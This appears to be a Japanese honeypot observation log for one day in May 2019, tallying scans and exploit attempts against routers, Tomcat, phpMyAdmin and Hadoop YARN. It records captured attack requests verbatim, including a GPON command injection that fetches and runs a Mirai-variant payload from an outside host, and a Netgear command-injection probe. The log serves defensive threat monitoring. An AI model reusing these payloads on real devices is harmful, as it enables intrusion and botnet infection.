WOWHoneypot観察(65日目)
2019/05/20(月)
トータルは176件です。
ハンティングログは以下です。
42.116.61.238 wget hxxp://45.67.14.194/xo/gpon |
110.88.245.50 wget+hxxp://hulo.r00ts.online/.configs/Lrep |
件数 | 概要 | リクエスト |
---|---|---|
66 | 調査 | HEAD / |
52 | アクセス | GET / |
36 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
1 | Hadoop YARN ResourceManagerの脆弱性を狙った通信 | POST /ws/v1/cluster/apps/new-application |
1 | LinksysルータのEシリーズの脆弱性を狙った通信 | POST /tmUnblock.cgi |
1 | MikroTikの調査 | GET /winbox.png |
1 | ZmEuによる調査 | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
1 | Netgear DGNデバイスの脆弱性を狙った通信 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo%20chicken&curpath=/¤tsetting.htm=1 |
1 | 不明 | GET /qnfxcjqr |
1 | ZmEuによるphpMyAdminの調査 | GET /pma/scripts/setup.php |
1 | ZmEuによるphpMyAdminの調査 | GET /phpmyadmin/scripts/setup.php |
1 | ZmEuによるphpMyAdminの調査 | GET /phpMyAdmin/scripts/setup.php |
1 | ZmEuによるphpMyAdminの調査 | GET /myadmin/scripts/setup.php |
1 | 調査 | GET /login.html |
1 | GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の通信 | GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://45.67.14.194/xo/gpon%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ |
1 | 不明 | GET /images/logo.gif |
1 | 不明 | GET /home.asp |
1 | 不明 | GET /fdsrwe |
1 | 不明 | GET /device_description.xml |
1 | 不明 | GET /currentsetting.htm |
1 | 不明 | GET /current_config/passwd |
1 | AVTechを狙った通信 | GET /cgi-bin/user/Config.cgi?.cab&action=get&category=Account.* |
1 | ZmEuによるphpMyAdminの調査 | GET /MyAdmin/scripts/setup.php |
1 | Strutsの調査 | GET /LoginPage.do |
1 | Gitの調査 | GET /.git/config |
新規で観測した通信が3つありました。
Hadoop YARN ResourceManagerの脆弱性を狙った通信
POST /ws/v1/cluster/apps/new-application HTTP/1.1
Host: *.*.*.*:8080
Content-Length: 0
User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.12.1.el6.x86_64
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
MikroTikの調査
GET /winbox.png HTTP/1.1
Host: *.*.*.*
Accept-Encoding: identity
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo%20chicken&curpath=/¤tsetting.htm=1 HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Mozilla/5.0